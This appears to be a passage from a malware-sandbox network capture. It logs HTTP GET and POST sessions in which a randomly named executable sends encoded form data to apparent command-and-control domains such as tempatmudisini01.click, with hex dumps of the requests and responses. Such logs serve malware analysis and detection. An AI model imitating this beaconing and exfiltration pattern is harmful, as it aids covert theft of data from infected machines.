                                                                                  Sep 25, 2024 09:57:38.203641891 CEST2817OUTData Raw: 39 36 65 43 69 7a 41 74 51 36 52 31 37 7a 6e 54 79 32 35 4e 4d 6b 74 2f 75 6c 36 70 78 67 42 74 61 61 47 75 63 41 70 77 30 4e 6b 76 77 4b 6e 64 65 68 6c 71 61 65 6a 58 4c 2b 50 53 35 48 56 49 4d 31 54 6d 4e 78 6b 59 33 67 30 74 6b 41 6a 71 55 36
                                                                                  Data Ascii: 96eCizAtQ6R17znTy25NMkt/ul6pxgBtaaGucApw0NkvwKndehlqaejXL+PS5HVIM1TmNxkY3g0tkAjqU6WxB7lZvNSSE7PkzlVbV1qimt6Cwtshz7VrDlNJHSdA/wOMYzdB69N4XU/lwv0uiK4LRsmHS31yxYRQVgY4WbbCqjBnB8vYzvh1TFu8npXcNpXDh/n/9KKpDP/b4RMxgBzA2fjjIiXbAKSJZ1NM3gEEeYYMGt6HzLe


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  45192.168.11.20498013.33.130.190803276C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Sep 25, 2024 09:57:40.843882084 CEST544OUTGET /yyvd/?Xb3xI=NqcJB3pZzzicH1g7OCf+o29R25c64Oc8uERdjrOnv2081dkqh5dbyixi1IWdR8hocD/pCHEuLxSxGQJUj5oKb5xJ79EhBhZUZc8Ysxx7YEgkHTlCWWMUk7k=&O4bP=9dRH6ZfHbJX HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.dhkatp.vip
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                  Sep 25, 2024 09:57:40.948753119 CEST398INHTTP/1.1 200 OK
                                                                                  Server: openresty
                                                                                  Date: Wed, 25 Sep 2024 07:57:40 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 258
                                                                                  Connection: close
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 58 62 33 78 49 3d 4e 71 63 4a 42 33 70 5a 7a 7a 69 63 48 31 67 37 4f 43 66 2b 6f 32 39 52 32 35 63 36 34 4f 63 38 75 45 52 64 6a 72 4f 6e 76 32 30 38 31 64 6b 71 68 35 64 62 79 69 78 69 31 49 57 64 52 38 68 6f 63 44 2f 70 43 48 45 75 4c 78 53 78 47 51 4a 55 6a 35 6f 4b 62 35 78 4a 37 39 45 68 42 68 5a 55 5a 63 38 59 73 78 78 37 59 45 67 6b 48 54 6c 43 57 57 4d 55 6b 37 6b 3d 26 4f 34 62 50 3d 39 64 52 48 36 5a 66 48 62 4a 58 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                  Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?Xb3xI=NqcJB3pZzzicH1g7OCf+o29R25c64Oc8uERdjrOnv2081dkqh5dbyixi1IWdR8hocD/pCHEuLxSxGQJUj5oKb5xJ79EhBhZUZc8Ysxx7YEgkHTlCWWMUk7k=&O4bP=9dRH6ZfHbJX"}</script></head></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  46192.168.11.2049802103.21.221.4803276C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Sep 25, 2024 09:57:46.519728899 CEST840OUTPOST /iydt/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.tempatmudisini01.click
                                                                                  Origin: http://www.tempatmudisini01.click
                                                                                  Referer: http://www.tempatmudisini01.click/iydt/
                                                                                  Content-Length: 202
                                                                                  Cache-Control: max-age=0
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                  Data Raw: 58 62 33 78 49 3d 4f 63 48 4c 71 62 47 63 44 59 45 4b 72 43 4e 57 52 41 61 72 77 58 48 74 44 34 6b 6d 50 4f 51 31 68 35 4d 75 65 55 79 67 36 30 49 43 50 4f 37 30 69 56 6f 57 43 49 74 45 74 75 38 49 69 56 70 36 41 79 74 32 77 2f 66 4d 77 4e 4f 2b 34 34 73 35 4b 63 72 73 4d 6f 5a 78 45 74 6a 50 4c 35 55 6c 59 4f 42 4a 42 79 6c 4e 75 72 67 52 30 6a 6e 34 7a 6d 42 6d 75 32 50 52 6a 64 36 63 68 38 30 36 76 52 4b 79 64 6e 62 31 50 41 59 57 5a 73 47 77 53 61 5a 71 4e 45 59 4a 7a 58 75 41 68 7a 4b 42 47 37 51 30 64 4f 2f 6d 31 57 4f 58 4e 47 57 43 75 38 46 6c 6a 50 6f 44 6c 51 56 70 5a 42 36 33 66 67 3d 3d
                                                                                  Data Ascii: Xb3xI=OcHLqbGcDYEKrCNWRAarwXHtD4kmPOQ1h5MueUyg60ICPO70iVoWCItEtu8IiVp6Ayt2w/fMwNO+44s5KcrsMoZxEtjPL5UlYOBJBylNurgR0jn4zmBmu2PRjd6ch806vRKydnb1PAYWZsGwSaZqNEYJzXuAhzKBG7Q0dO/m1WOXNGWCu8FljPoDlQVpZB63fg==
                                                                                  Sep 25, 2024 09:57:47.215883970 CEST1289INHTTP/1.1 404 Not Found
                                                                                  Connection: close
                                                                                  x-powered-by: PHP/7.4.33
                                                                                  x-litespeed-tag: 894_HTTP.404
                                                                                  expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                  content-type: text/html; charset=UTF-8
                                                                                  link: <https://tempatmudisini01.click/wp-json/>; rel="https://api.w.org/"
                                                                                  x-litespeed-cache-control: no-cache
                                                                                  cache-control: no-cache, no-store, must-revalidate, max-age=0
                                                                                  content-length: 11547
                                                                                  content-encoding: br
                                                                                  vary: Accept-Encoding
                                                                                  date: Wed, 25 Sep 2024 07:57:47 GMT
                                                                                  server: LiteSpeed
                                                                                  Data Raw: e2 af 3b 8a aa da 0f 11 51 d4 87 00 8d 94 85 f3 f7 47 c8 30 f7 ff fe 52 ff ff db fc 7c ed a8 eb d8 d0 22 21 f0 18 1c 7c a6 31 b7 c3 74 ef 6b b2 b2 64 d8 d8 6a 84 a4 27 09 63 1f ea 3f 5b f5 7a b6 2f a7 57 c6 49 5a 63 89 af a7 0d 50 67 fb 4b b6 75 e2 53 56 81 04 a8 06 10 16 30 4d a7 ab ff 7f 7f 69 96 8b 76 b0 db a6 0b 75 84 8e e4 54 e9 a1 c2 0a ab 6c 75 ef 7b ef 9c fc 81 62 04 c5 08 8a 91 14 30 15 92 ed 42 86 fb ee 83 ff e7 0f 78 04 5e c9 8c 2b c9 44 85 36 f6 02 61 9b 32 b5 e3 d5 02 50 15 68 6a 85 47 bb c1 2e 65 8a 12 1f c3 b4 66 fb db f5 de 04 11 11 15 91 bc 0f 99 99 b6 b5 eb 3a 7e 78 86 00 89 59 92 80 9e 8d 12 30 f7 2e ba 3b 86 4e 1d bd ea d0 15 41 4d 3f be 5f c7 41 df d3 e2 c2 f5 51 38 8f a1 22 39 9f 1f e5 81 14 96 08 21 47 6e 45 3d af 8a ba 22 85 0d bd 77 a3 be 16 0a ab 1c 17 7d 5b 68 e6 cc de 04 3f fb 38 de ac 13 67 2a 3b 71 40 ba 59 f5 c1 38 94 e7 a3 18 cc 02 3f 9c 20 83 c2 dd 1b 71 40 d0 26 c0 01 b2 de fe e9 8b 4d 91 e7 5b 38 86 60 7d 99 65 01 3b 2b 42 d7 37 d2 4b 2d 79 ce b6 b1 4f 76 84 f6 b0 [TRUNCATED]
                                                                                  Data Ascii: ;QG0R|"!|1tkdj'c?[z/WIZcPgKuSV0MivuTlu{b0Bx^+D6a2PhjG.ef:~xY0.;NAM?_AQ8"9!GnE="w}[h?8g*;q@Y8? q@&M[8`}e;+B7K-yOv;%38TZB}Ax=ZitssmoeYdgu'PFi.:?4XWCN2>dg3*M62/C/gl]CFR@JrCJ3O6:.$I9Zf"g>d@!gBw:T(<NjBWzF}6\+ `^f?T'I80Oq;1&cpk"nLa^qrz^>'<?vIz?'A8$RnW~^cRN}-abY-IxV_Yr*IRxqHym"5Q0/~tN\bdv ?DF:KWEJjf*pZA-fdr_5aAd
                                                                                  Sep 25, 2024 09:57:47.216227055 CEST1289INData Raw: 47 d2 2a 71 20 65 e0 7b 43 c7 98 92 87 be d9 cc eb 87 be 69 db f9 43 df 22 6f 1f fa 82 f3 e6 a1 2f 56 62 3d b7 38 02 fa d9 fb 11 24 df df e4 e5 0d ea c1 4d 2b fe df eb 9c 2c 46 44 14 68 69 c9 74 fa f3 70 db 76 f1 d0 37 fb 05 7f e8 9b 7a b5 fe ff
                                                                                  Data Ascii: G*q e{CiC"o/Vb=8$M+,FDhitpv7zg,S^@ps\LyY"nIZvob{x>b9?=I8pcCnphZl36S}xx!YvOU<<<) =7IRQ9v?:9hH:Rw(
                                                                                  Sep 25, 2024 09:57:47.216243029 CEST1289INData Raw: 86 21 6b 45 d0 60 82 52 d1 db 4b e9 60 5c 73 45 59 d7 a0 9b dc 9a d2 e8 71 43 11 99 2b 53 9e 17 e8 25 0d c6 28 5f 19 4a df 62 a1 6d 0d d3 f2 96 b7 5c d7 20 61 31 fd 0b 48 ed d1 05 74 3a 3c 60 b1 85 1d f6 e9 69 2f ea 67 85 56 69 30 85 42 9f 85 ef
                                                                                  Data Ascii: !kE`RK`\sEYqC+S%(_Jbm\ a1Ht:<`i/gVi0BW3HyN="]$]x;6/i)81t/j y$]c-E(fNdA%>Td!iabOxEA5P7
                                                                                  Sep 25, 2024 09:57:47.216258049 CEST1289INData Raw: 72 e8 af 20 23 b0 c2 67 a8 b0 b8 80 e1 a2 b2 f6 ef 3d 66 70 b2 d3 6d 33 a1 94 d9 cc 54 9e 46 72 44 d1 48 7d f8 1a ea 98 b3 a3 f0 34 a7 97 9e 1e 8b b9 53 9e 4f 79 31 e5 e5 94 56 ca 5a 7e 59 39 2b 96 d8 41 c1 e6 eb 25 76 57 32 48 35 03 b5 51 f0 85
                                                                                  Data Ascii: r #g=fpm3TFrDH}4SOy1VZ~Y9+A%vW2H5QRhg|,pr9kTb2;w:UQUQa~XayV*X 7xFd2I\G0&umf9[:BG*5KZ&_hvQ%ZI
                                                                                  Sep 25, 2024 09:57:47.216274023 CEST1289INData Raw: 68 b2 50 32 9a f6 b4 b6 b6 e9 7f 7b 12 af 94 3d ad 18 a0 24 b1 4f 5c e0 e3 89 5d 15 f6 21 96 f8 78 c0 38 0a 47 08 cc f7 81 03 d8 4d 82 fb 08 b9 d4 3d ad 77 bf dc e3 70 78 9f b8 df be 27 8e 90 a2 a7 69 f5 38 0f ff bc 3e 43 ed 2f 3f bb ad eb b6 f7
                                                                                  Data Ascii: hP2{=$O\]!x8GM=wpx'i8>C/?^}l,sKNbr~{#c1Bx|=`XC9.dwrj(4c^!b A)j.`ra4OQXh>I%t*J9
                                                                                  Sep 25, 2024 09:57:47.216285944 CEST1289INData Raw: f7 f9 78 8c 09 6e 61 8e cb 05 65 67 b9 de 6f 04 7e 92 94 72 56 ac 9c 26 a9 40 49 64 b1 1a f3 24 3d c9 d4 b4 9e 64 ea 91 93 51 34 be 1f 42 c5 2d c8 52 d6 d5 84 02 fb 9e d6 dc 82 2e b9 d9 16 72 0b 88 06 5c 42 7a 61 ec 34 a4 3a bb c9 82 59 cf bf 73
                                                                                  Data Ascii: xnaego~rV&@Id$=dQ4B-R.r\Bza4:YszB'S/O)!P/53uG$)OQ]Hu;0_3fQ880{p(K"&'+xPJcUET5nQh"WB


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  47192.168.11.2049803103.21.221.4803276C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Sep 25, 2024 09:57:49.377686977 CEST860OUTPOST /iydt/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.tempatmudisini01.click
                                                                                  Origin: http://www.tempatmudisini01.click
                                                                                  Referer: http://www.tempatmudisini01.click/iydt/
                                                                                  Content-Length: 222
                                                                                  Cache-Control: max-age=0
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                  Data Raw: 58 62 33 78 49 3d 4f 63 48 4c 71 62 47 63 44 59 45 4b 71 68 46 57 53 68 61 72 32 33 48 75 41 34 6b 6d 56 2b 51 35 68 35 51 75 65 56 6d 4f 36 41 6b 43 4b 66 4c 30 6a 52 63 57 42 49 74 45 35 2b 39 43 73 31 70 68 41 79 78 55 77 36 33 4d 77 4c 69 2b 34 39 51 35 4b 4e 72 72 50 59 5a 7a 50 4e 6a 4a 45 5a 55 6c 59 4f 42 4a 42 79 78 33 75 72 34 52 30 7a 33 34 79 43 64 6c 79 6d 50 4f 69 64 36 63 6c 38 30 32 76 52 4b 63 64 6c 76 50 50 46 63 57 5a 74 32 77 53 49 39 72 44 45 59 44 33 58 76 52 77 77 62 6a 4a 2f 35 44 5a 70 69 68 73 46 47 67 46 77 48 59 7a 4f 78 42 67 63 30 78 68 67 73 42 62 44 37 73 43 67 42 6a 69 63 35 46 51 64 33 52 62 6a 4c 31 75 56 2b 58 4c 34 38 3d
                                                                                  Data Ascii: Xb3xI=OcHLqbGcDYEKqhFWShar23HuA4kmV+Q5h5QueVmO6AkCKfL0jRcWBItE5+9Cs1phAyxUw63MwLi+49Q5KNrrPYZzPNjJEZUlYOBJByx3ur4R0z34yCdlymPOid6cl802vRKcdlvPPFcWZt2wSI9rDEYD3XvRwwbjJ/5DZpihsFGgFwHYzOxBgc0xhgsBbD7sCgBjic5FQd3RbjL1uV+XL48=
                                                                                  Sep 25, 2024 09:57:50.075261116 CEST1289INHTTP/1.1 404 Not Found
                                                                                  Connection: close
                                                                                  x-powered-by: PHP/7.4.33
                                                                                  x-litespeed-tag: 894_HTTP.404
                                                                                  expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                  content-type: text/html; charset=UTF-8
                                                                                  link: <https://tempatmudisini01.click/wp-json/>; rel="https://api.w.org/"
                                                                                  x-litespeed-cache-control: no-cache
                                                                                  cache-control: no-cache, no-store, must-revalidate, max-age=0
                                                                                  transfer-encoding: chunked
                                                                                  content-encoding: br
                                                                                  vary: Accept-Encoding
                                                                                  date: Wed, 25 Sep 2024 07:57:49 GMT
                                                                                  server: LiteSpeed
                                                                                  Data Raw: 32 64 31 62 0d 0a f0 d7 2d 8a aa da 0f 11 51 d4 87 00 8d 94 85 f3 f7 47 c8 30 f7 ff fe 52 ff ff db fc 7c ed a8 eb d8 d0 22 21 f0 18 1c 7c a6 31 b7 c3 74 ef 6b b2 b2 64 d8 d8 6a 84 a4 27 09 63 1f ea 3f 5b f5 7a b6 2f a7 57 c6 49 5a 63 89 af a7 0d 50 67 fb 4b b6 75 e2 53 56 81 04 a8 06 10 16 30 4d a7 ab ff 7f 7f 69 96 8b 76 b0 db a6 0b 75 84 8e e4 54 e9 a1 c2 0a ab 6c 75 ef 7b ef 9c fc 81 62 04 c5 08 8a 91 14 30 15 92 ed 42 86 fb ee 83 ff e7 0f 78 04 5e c9 8c 2b c9 44 85 36 f6 02 61 9b 32 b5 e3 d5 02 50 15 68 6a 85 47 bb c1 2e 65 8a 12 1f c3 b4 66 fb db f5 de 04 11 11 15 91 bc 0f 99 99 b6 b5 eb 3a 7e 78 86 00 89 59 92 80 9e 8d 12 30 f7 2e ba 3b 86 4e 1d bd ea d0 15 41 4d 3f be 5f c7 41 df d3 e2 c2 f5 51 38 8f a1 22 39 9f 1f e5 81 14 96 08 21 47 6e 45 3d af 8a ba 22 85 0d bd 77 a3 be 16 0a ab 1c 17 7d 5b 68 e6 cc de 04 3f fb 38 de ac 13 67 2a 3b 71 40 ba 59 f5 c1 38 94 e7 a3 18 cc 02 3f 9c 20 83 c2 dd 1b 71 40 d0 26 c0 01 b2 de fe e9 8b 4d 91 e7 5b 38 86 60 7d 99 65 01 3b 2b 42 d7 37 d2 4b 2d 79 ce b6 [TRUNCATED]
                                                                                  Data Ascii: 2d1b-QG0R|"!|1tkdj'c?[z/WIZcPgKuSV0MivuTlu{b0Bx^+D6a2PhjG.ef:~xY0.;NAM?_AQ8"9!GnE="w}[h?8g*;q@Y8? q@&M[8`}e;+B7K-yOv;%38TZB}Ax=ZitssmoeYdgu'PFi.:?4XWCN2>dg3*M62/C/gl]CFR@JrCJ3O6:.$I9Zf"g>d@!gBw:T(<NjBWzF}6\+ `^f?T'I80Oq;1&cpk"nLa^qrz^>'<?vIz?'A8$RnW~^cRN}-abY-IxV_Yr*IRxqHym"5Q0/~tN\bdv ?DF:KWEJjf*pZA-fdr_5a
                                                                                  Sep 25, 2024 09:57:50.075280905 CEST1289INData Raw: fe ba f9 41 86 fa 18 87 64 ac 85 47 d2 2a 71 20 65 e0 7b 43 c7 98 92 87 be d9 cc eb 87 be 69 db f9 43 df 22 6f 1f fa 82 f3 e6 a1 2f 56 62 3d b7 38 02 fa d9 fb 11 24 df df e4 e5 0d ea c1 4d 2b fe df eb 9c 2c 46 44 14 68 69 c9 74 fa f3 70 db 76 f1
                                                                                  Data Ascii: AdG*q e{CiC"o/Vb=8$M+,FDhitpv7zg,S^@ps\LyY"nIZvob{x>b9?=I8pcCnphZl36S}xx!YvOU<<<) =7IRQ9v?:9h
                                                                                  Sep 25, 2024 09:57:50.075309038 CEST1289INData Raw: 28 71 2d b5 f7 f6 2e b0 5c d8 59 72 e8 af 20 23 b0 c2 67 a8 b0 b8 80 e1 a2 b2 f6 ef 3d 66 70 b2 d3 6d 33 a1 94 d9 cc 54 9e 46 72 44 d1 48 7d f8 1a ea 98 b3 a3 f0 34 a7 97 9e 1e 8b b9 53 9e 4f 79 31 e5 e5 94 56 ca 5a 7e 59 39 2b 96 d8 41 c1 e6 eb
                                                                                  Data Ascii: (q-.\Yr #g=fpm3TFrDH}4SOy1VZ~Y9+A%vW2H5QRhg|,pr9kTb2;w:UQUQa~XayV*X 7xFd2I\G0&umf9[:BG*5KZ&_hv
                                                                                  Sep 25, 2024 09:57:50.075323105 CEST1289INData Raw: ca 93 fa d9 7e 4d c3 77 c8 80 9d 86 21 6b 45 d0 60 82 52 d1 db 4b e9 60 5c 73 45 59 d7 a0 9b dc 9a d2 e8 71 43 11 99 2b 53 9e 17 e8 25 0d c6 28 5f 19 4a df 62 a1 6d 0d d3 f2 96 b7 5c d7 20 61 31 fd 0b 48 ed d1 05 74 3a 3c 60 b1 85 1d f6 e9 69 2f
                                                                                  Data Ascii: ~Mw!kE`RK`\sEYqC+S%(_Jbm\ a1Ht:<`i/gVi0BW3HyN="]$]x;6/i)81t/j y$]c-E(fNdA%>Td!iabOxE
                                                                                  Sep 25, 2024 09:57:50.075335026 CEST1289INData Raw: e5 0f 0c e6 9d c0 8e 5d ea a1 e4 68 b2 50 32 9a f6 b4 b6 b6 e9 7f 7b 12 af 94 3d ad 18 a0 24 b1 4f 5c e0 e3 89 5d 15 f6 21 96 f8 78 c0 38 0a 47 08 cc f7 81 03 d8 4d 82 fb 08 b9 d4 3d ad 77 bf dc e3 70 78 9f b8 df be 27 8e 90 a2 a7 69 f5 38 0f ff
                                                                                  Data Ascii: ]hP2{=$O\]!x8GM=wpx'i8>C/?^}l,sKNbr~{#c1Bx|=`XC9.dwrj(4c^!b A)j.`ra4OQXh>
                                                                                  Sep 25, 2024 09:57:50.075350046 CEST1289INData Raw: 77 f3 46 f4 7a 9f db 34 55 2e c2 f7 f9 78 8c 09 6e 61 8e cb 05 65 67 b9 de 6f 04 7e 92 94 72 56 ac 9c 26 a9 40 49 64 b1 1a f3 24 3d c9 d4 b4 9e 64 ea 91 93 51 34 be 1f 42 c5 2d c8 52 d6 d5 84 02 fb 9e d6 dc 82 2e b9 d9 16 72 0b 88 06 5c 42 7a 61
                                                                                  Data Ascii: wFz4U.xnaego~rV&@Id$=dQ4B-R.r\Bza4:YszB'S/O)!P/53uG$)OQ]Hu;0_3fQ880{p(K"&'+xPJcUET5n
                                                                                  Sep 25, 2024 09:57:50.075362921 CEST1289INData Raw: bb 50 50 39 84 2d b4 72 8a 37 07 dc ca 29 df fa 62 92 52 21 00 5b 7a f7 85 d2 b2 96 90 bc d0 28 9d 58 e2 e4 85 3e f9 64 f9 95 50 04 78 c1 ab 86 6a 2a ea cf a5 31 4f 63 4b 65 de 0a 9f 65 69 73 ba d0 3c 2a 4b 97 ff 85 36 3b e6 8a a1 91 e1 21 af 0c
                                                                                  Data Ascii: PP9-r7)bR![z(X>dPxj*1OcKeeis<*K6;!QCf,F;Ondd2pv9xvx9w}qm~C#oH}%BhT^OrgweX%+&NG|d
                                                                                  Sep 25, 2024 09:57:50.075375080 CEST1289INData Raw: 55 f5 c8 cd 97 09 cd 7b 76 1f 99 78 b5 cf a5 36 7c 14 da fe 3c fd 4c 3c 39 fd 03 22 f7 ba ea f0 7b 02 aa 69 02 8a e9 f3 29 79 5a 9c d2 49 5f 61 8e b1 24 6f 43 19 f7 1b aa 7b 15 29 15 ed 35 bf 0e d9 98 69 1c e7 5a 37 c2 d7 3e 34 5d ad 7b dd c9 4a
                                                                                  Data Ascii: U{vx6|<L<9"{i)yZI_a$oC{)5iZ7>4]{J7N.aPCCKmmoqDcy9C%piopKLdB3Je@/&(qPP"&8*#LYsSh@/-]AplQvH,5D`@g
                                                                                  Sep 25, 2024 09:57:50.075387001 CEST1289INData Raw: 15 09 ae 47 02 a1 d1 21 f6 0a cd ea be 21 bb 3b 87 75 80 73 45 16 04 2e 15 59 b3 a5 ad db d1 dc 5e ec 6c ce 96 15 54 c6 45 09 f9 cb ac cc 9f 0e 3b 93 bf 31 35 32 66 76 4e c1 92 03 20 50 93 1a 59 67 1a a1 68 1e 40 b0 93 66 28 95 4e 87 8d 2e c1 58
                                                                                  Data Ascii: G!!;usE.Y^lTE;152fvN PYgh@f(N.XAd:-jpKO;(gRAuB^s'/4}4G?c\G(uftKPjN{E=|pF!l&)\9$"8_~V"HpcI,JOM
                                                                                  Sep 25, 2024 09:57:50.075398922 CEST440INData Raw: 71 07 72 d6 64 aa 87 c4 6c 77 99 d8 4d 26 6d a1 34 10 44 f5 ad 2d 8a ee b2 c3 10 a9 dd 6a ae 23 05 ee 07 ea 98 84 ea b2 94 a3 5f 3d 35 65 77 16 d9 45 93 f8 e4 d1 32 71 d2 71 69 f4 93 70 e0 9f a5 fd 47 ea e7 0f 2d c4 15 50 75 96 80 71 18 82 f7 86
                                                                                  Data Ascii: qrdlwM&m4D-j#_=5ewE2qqipG-Puq\q1:!4L&C/wmM&Y.g@ Sh~5B-,AZlX4bAOLFuP-{M&~`/=vG[yuKAj-L2o"]=<#B|qj5?4
                                                                                  Sep 25, 2024 09:57:50.076383114 CEST11INData Raw: 31 0d 0a 03 0d 0a 30 0d 0a 0d 0a
                                                                                  Data Ascii: 10


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  48192.168.11.2049804103.21.221.4803276C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Sep 25, 2024 09:57:52.263336897 CEST2578OUTPOST /iydt/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.tempatmudisini01.click
                                                                                  Origin: http://www.tempatmudisini01.click
                                                                                  Referer: http://www.tempatmudisini01.click/iydt/
                                                                                  Content-Length: 7370
                                                                                  Cache-Control: max-age=0
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                  Data Raw: 58 62 33 78 49 3d 4f 63 48 4c 71 62 47 63 44 59 45 4b 71 68 46 57 53 68 61 72 32 33 48 75 41 34 6b 6d 56 2b 51 35 68 35 51 75 65 56 6d 4f 36 42 77 43 4b 4e 44 30 69 32 41 57 41 49 74 45 6d 4f 39 42 73 31 6f 68 41 79 70 51 77 36 7a 32 77 49 57 2b 37 66 6f 35 62 4a 33 72 59 6f 5a 7a 41 74 6a 49 4c 35 56 39 59 4f 52 4e 42 79 68 33 75 72 34 52 30 31 62 34 37 32 42 6c 77 6d 50 52 6a 64 36 51 68 38 30 61 76 51 69 71 64 6c 72 6c 50 32 6b 57 5a 4e 6d 77 55 37 5a 72 63 30 59 46 77 58 76 4a 77 77 58 56 4a 37 59 36 5a 74 6a 70 73 47 32 67 41 48 4b 53 32 50 56 46 38 74 49 79 68 43 4d 58 66 43 72 46 44 77 39 45 68 39 74 54 53 5a 7a 68 63 7a 4c 35 38 6c 65 49 53 6f 35 50 62 6c 53 43 46 63 59 64 69 6d 51 6a 34 6f 71 6e 50 44 54 77 59 4d 36 61 39 50 34 4d 4d 66 45 47 44 73 35 42 4f 5a 56 62 46 36 62 43 51 66 4b 2b 78 2f 34 4e 4c 49 5a 77 62 79 61 4b 47 76 4c 47 41 57 2f 49 69 64 43 37 59 6b 61 35 45 64 44 43 52 74 49 71 38 6b 75 52 6d 56 35 53 33 4c 36 64 50 62 6b 4b 77 38 75 69 31 48 34 61 76 58 57 61 4c 63 50 4b [TRUNCATED]
                                                                                  Data Ascii: Xb3xI=OcHLqbGcDYEKqhFWShar23HuA4kmV+Q5h5QueVmO6BwCKND0i2AWAItEmO9Bs1ohAypQw6z2wIW+7fo5bJ3rYoZzAtjIL5V9YORNByh3ur4R01b472BlwmPRjd6Qh80avQiqdlrlP2kWZNmwU7Zrc0YFwXvJwwXVJ7Y6ZtjpsG2gAHKS2PVF8tIyhCMXfCrFDw9Eh9tTSZzhczL58leISo5PblSCFcYdimQj4oqnPDTwYM6a9P4MMfEGDs5BOZVbF6bCQfK+x/4NLIZwbyaKGvLGAW/IidC7Yka5EdDCRtIq8kuRmV5S3L6dPbkKw8ui1H4avXWaLcPKe42dxkKv7GkBS54ZZGFDmUUl8pmYnkZtvVvrzY2SQZ1D1uIVUicxmR7kf9vE4TVuVb0G7wYBPTmSv+5fSWJUxT24Jr7ip+Hi/L/uqKB/b88e17s85STL5z/11C+wWXJcegQXCHOwkdpAPZsP4wiiXc7QwNMLDHCdfdwlF/jp3LuuVETViyAx6tsrHI7DP1oIe7gPVzcNYyNjqjHEKF5s801jCWl4ottQgO9iS+MlXGluGzCd2j4ewNIGi9BQNN4xddoVEqJb5odPdtV2lV77u6DgOx9P7JllXanNJR5UI2BbduZ0CE34T6ayFsEU4BkG+4ll3jPxxh5AjyXv6u2gs8qcD0dK+KybhScsBbgM9ybocomI8OZPJ1C7UG+OmakGpn2ioD84L/t2hFivd2fUv8XRPWBSK30gcIxouf3UOTgmQDsfC8njqHiMof2ZgF1j5y2ewXej0/NKgSbhjWGQbDGtcg5sxumcpEsl/vZpjUrkf3Q3G+YMLobngY6XVclQ7kJDjx2/kPtIXH7eBIZKisXqqECyXzrzgJk0fTmICu2zqVn3wIYLdzeA9h2io2s0ukJJt+53cRQjx4yFkk0az1r02latL4XbV5zjjyfWDJVVJSi3wUDDZ8bzsjGEjNCM/ndT4iawIBL8iV4YaK3yxUixn2kJolfPo0 [TRUNCATED]
